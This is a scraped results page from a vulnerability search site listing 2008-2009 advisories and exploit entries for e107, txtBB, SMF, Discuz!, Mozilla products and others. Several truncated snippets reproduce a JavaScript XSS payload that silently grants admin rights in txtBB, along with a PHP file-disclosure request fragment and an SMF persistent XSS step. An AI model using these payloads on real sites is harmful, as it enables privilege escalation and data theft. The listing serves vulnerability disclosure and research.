Lucene search
K

4524 matches found

exploitpack
exploitpack
added 2009/07/23 12:0 a.m.16 views

e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure

e107 Plugin mygallery 2.4.1 - readfile Local File Disclosure Web 2 XPL : File 2 Read : "; if $POST'xpl' $data .= "GET /$vuln$trasv$file HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data...

7.3AI score
Exploits0
myhack58
myhack58
added 2009/06/24 12:0 a.m.25 views

Old Y article management system of the injection 0day-vulnerability warning-the black bar safety net

Magic springsB. S. N. hacking Defense Vulnerability rating: moderate Vulnerability description: The vulnerability appears in the js. asp, we first look at the source code. Code: If CheckStrRequest"ClassNo" "" then ClassNo = splitCheckStrRequest"ClassNo","|" 'Here is to get the variable using...

Exploits0
OpenVAS
OpenVAS
added 2009/06/16 12:0 a.m.38 views

Mozilla Seamonkey Multiple Vulnerability Jun-09 (Linux)

The host is installed with Seamonkey, which is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: gbseamonkeymultvulnjun09lin.nasl 4869 2016-12-29 11:01:45Z teissa $ Mozilla Seamonkey Multiple Vulnerabilities Jun-09 Linux Authors: Antu Sanadi Copyright: Copyright c 2009 Greenbone...

9.3CVSS0.7AI score0.09282EPSS
Exploits7References8
Mozilla
Mozilla
added 2009/06/11 12:0 a.m.33 views

Race condition while accessing the private data of a NPObject JS wrapper class object — Mozilla

Jakob Balle and Carsten Eiram of Secunia Research reported a race condition in NPObjWrapperNewResolve when accessing the properties of a NPObject, a wrapped JSObject. Balle and Eiram demonstrated that this condition could be reached by navigating away from a web page during the loading of a Java...

9.3CVSS1.5AI score0.04331EPSS
Exploits2References2Affected Software1
myhack58
myhack58
added 2009/04/13 12:0 a.m.33 views

PHPWIND & DISCUZ! CSRF vulnerability-vulnerability warning-the black bar safety net

PHPWIND & DISCUZ! CSRF vulnerability affects versions: Discuz! 6.0.0 & 6.1.0 & 7.0.0 PHPWIND 6.0 & 6.3 & 7.0 Vulnerability description: PHPWIND & DISCUZ! The presence of CSRF vulnerabilities, triggering PHPWIND & DISCUZ! CSRF WORM! ... d/b31e4d2e6270c384 reference ... d/b31e4d2e6270c384 Safety...

7AI score
Exploits0
myhack58
myhack58
added 2009/02/08 12:0 a.m.15 views

Next injection protection cross-site scripting request spoofing(CSRF)-vulnerability warning-the black bar safety net

Author: superhei, 出处 :ph4nt0m.org CSRFCross-site Request Forgery,cross-site request cheat in the past year nn2always fire, however, CSRF is very difficult to completely prevent, following some of my Bypass Preventingside note CSRF tricks...... CSRFCross-site Request Forgery,cross-site request che...

7.3AI score
Exploits0
seebug.org
seebug.org
added 2009/02/06 12:0 a.m.16 views

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit

No description provided by source. !-- txtBB = 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit By cOndemned Greetz: ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z & str0ke ; Exploitation: 1. Create an account 2. Go to http://host/txtbb10RC3path/index.php?type=account 3. Put exploit code...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2009/02/05 12:0 a.m.29 views

txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges

var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz'; milw0rm.com 2009-02-05...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2009/02/05 12:0 a.m.10 views

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded';...

0.5AI score
Exploits0
0day.today
0day.today
added 2009/02/05 12:0 a.m.312 views

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit

Exploit for unknown platform in category web applications ================================================================= txtBB var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type',...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2009/02/05 12:0 a.m.24 views

txtBB 1.0 RC3 Injection

var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz';...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2009/02/05 12:0 a.m.51 views

SMF 1.1.7 Persistent XSS &#40;requires permision to edit censor&#41;

SMF 1.1.7 simplemachines.org XSS Exploitation: If you can modify the censor on a SMF forum, then you can make it execute arbitrary JS code. http://SMF.Forum.com/index.php?action=postsettings;sa=censor Just add the following entry: http://www.test.xss/ = http://www.test-xss/"...

0.5AI score
Exploits0
Packet Storm
Packet Storm
added 2009/02/03 12:0 a.m.21 views

SMF 1.1.7 Cross Site Scripting

SMF 1.1.7 simplemachines.org XSS Exploitation: If you can modify the censor on a SMF forum, then you can make it execute arbitrary JS code. http://SMF.Forum.com/index.php?action=postsettings;sa=censor Just add the following entry: http://www.test.xss/ = http://www.test-xss/"...

0.2AI score
Exploits0
myhack58
myhack58
added 2008/11/27 12:0 a.m.20 views

The use of Flash package net horse-vulnerability warning-the black bar safety net

The use of Flash package network. We use the service-end technical protection network horse, protection to protect the go, network the horse of the JS code will still be caught, in those browser capture tool, network the horse of the JS exposed, the principle is very simple, net horse, no matter...

0.3AI score
Exploits0
Prion
Prion
added 2008/11/13 11:30 a.m.17 views

Memory corruption

The AppendAttributeValue function in the JavaScript engine in Mozilla Firefox 2.x before 2.0.0.18, Thunderbird 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13 allows remote attackers to cause a denial of service crash via unknown vectors that trigger memory corruption, as demonstrated by...

10CVSS6.3AI score0.03477EPSS
Exploits0References10Affected Software3
Packet Storm
Packet Storm
added 2008/10/29 12:0 a.m.30 views

saba-xss.txt

Saba 2.0 Cross Site Scripting JS Injection http://Aria-Security.com --------------------------------------------------------------- Saba 2.0 is a Persian Forum Script Dork: Powered by Saba 2.0 Vulnerable file: usercp.php usercp.php?username=YourUserName The above script can be inserted as Locatio...

7.4AI score
Exploits0
UbuntuCve
UbuntuCve
added 2008/09/24 12:0 a.m.35 views

CVE-2008-4058

The XPConnect component in Mozilla Firefox before 2.0.0.17 and 3.x before 3.0.2, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allows remote attackers to "pollute XPCNativeWrappers" and execute arbitrary code with chrome privileges via vectors related to 1 chrome XBL and 2 chrome JS...

7.5CVSS7.4AI score0.05077EPSS
Exploits1References4
myhack58
myhack58
added 2008/08/01 12:0 a.m.18 views

Alibaba network operators blog can insert malicious code-vulnerability warning-the black bar safety net

The author of the article: the attacker Sources of information: the security cordon www.hackeroo.com Article note: have to mA E-MAIL In the Alibaba net business blog allows us the filling of the Ali Mama advertising, but he did not filter out in addition to Ali's mom other than the address,so you...

0.1AI score
Exploits0
myhack58
myhack58
added 2008/07/14 12:0 a.m.29 views

Small conference Baidu post bar title XSS vulnerabilities [Fixed]-bug warning-the black bar safety net

Source: 80sex The first reference to http://www. 80sec. com/charset-xss. html.:) This vulnerability in different browsers on the performance of the out the effects of each different, in GBKXX coding the next FF will recognize this illegal character put it when half the width of the byte and a...

7.2AI score
Exploits0
seebug.org
seebug.org
added 2008/07/10 12:0 a.m.19 views

Yahoo! 统计功能跨站脚本漏洞

yahoo统计功能被广泛用于站点的访问统计,用于做各种数据分析如访问来源,客户访问页面统计等等,具体信息可以访问网址 http://tongjia.yahoo.cn。但是80sec发现该功能存在严重的漏洞,可能导致用户信息被窃取,并且可以占有该用户的yahoo ID,进入包括mail.yahoo.cn之内的其他服务。 yahoo统计功能在获得用户提交的参数时缺少必要的过滤,导致恶意用户可以提交精心构造的数据进入控制面板后台,譬如访问地址信息就会不加过滤地进入后...

7.1AI score
Exploits0
Rows per page
Query Builder